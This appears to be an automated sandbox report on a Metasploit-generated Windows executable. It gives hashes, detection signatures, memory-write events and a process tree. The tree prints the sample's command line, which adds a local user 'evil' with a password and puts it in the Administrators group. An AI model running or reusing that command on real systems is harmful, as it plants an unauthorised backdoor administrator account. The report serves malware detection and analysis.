Analysis
- max time kernel: 120s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 20-04-2024 20:04
Behavioral task: behavioral1
- Sample: fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe
- Resource: win10v2004-20240412-en
General
- Target: fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe
- Size: 72KB
- MD5: fd8918c67d99f1c54e592b5fe79cd104
- SHA1: 9a10e9981c1e4c75c5a9b5253bd86d9057cc4fcf
- SHA256: c6d32aa42367461bbf30392751a11a894b24afdf53727efcdd21233c798cf1e7
- SHA512: 9f6bc37aca37be6404ba348193608e8f3282a3ca2d879c40d2b467828c7300f0c63156da7e0cc21acff0cfd646ad09ed0ca4b3c0546f35925768ad7c340f9b81
- SSDEEP: 1536:IN/ukRRX3Y/S2SF8TuySzzWMenMb+KR0Nc8QsJq39:y2iRXzWTd1ne0Nc8QsC9
Malware Config
- Extracted: metasploit
- Payload: windows/exec
Signatures
- MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Runs net.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes: fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe, cmd.exe, net.exe, net.exe

  description                        pid   process                                             target process
  PID 2148 wrote to memory of 3048   2148  fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe  cmd.exe
  PID 2148 wrote to memory of 3048   2148  fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe  cmd.exe
  PID 2148 wrote to memory of 3048   2148  fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe  cmd.exe
  PID 2148 wrote to memory of 3048   2148  fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe  cmd.exe
  PID 3048 wrote to memory of 592    3048  cmd.exe                                             net.exe
  PID 3048 wrote to memory of 592    3048  cmd.exe                                             net.exe
  PID 3048 wrote to memory of 592    3048  cmd.exe                                             net.exe
  PID 3048 wrote to memory of 592    3048  cmd.exe                                             net.exe
  PID 592 wrote to memory of 324     592   net.exe                                             net1.exe
  PID 592 wrote to memory of 324     592   net.exe                                             net1.exe
  PID 592 wrote to memory of 324     592   net.exe                                             net1.exe
  PID 592 wrote to memory of 324     592   net.exe                                             net1.exe
  PID 3048 wrote to memory of 1164   3048  cmd.exe                                             net.exe
  PID 3048 wrote to memory of 1164   3048  cmd.exe                                             net.exe
  PID 3048 wrote to memory of 1164   3048  cmd.exe                                             net.exe
  PID 3048 wrote to memory of 1164   3048  cmd.exe                                             net.exe
  PID 1164 wrote to memory of 1012   1164  net.exe                                             net1.exe
  PID 1164 wrote to memory of 1012   1164  net.exe                                             net1.exe
  PID 1164 wrote to memory of 1012   1164  net.exe                                             net1.exe
  PID 1164 wrote to memory of 1012   1164  net.exe                                             net1.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe"
  PID: 2148
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c net user evil salah /ADD && net localgroup Administrators evil /ADD
    PID: 3048
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe
      Command line: net user evil salah /ADD
      PID: 592
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 user evil salah /ADD
        PID: 324
    - C:\Windows\SysWOW64\net.exe
      Command line: net localgroup Administrators evil /ADD
      PID: 1164
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators evil /ADD
        PID: 1012
Network
MITRE ATT&CK Enterprise v15
Downloads
- memory/2148-0-0x0000000000020000-0x0000000000021000-memory.dmp (Filesize: 4KB)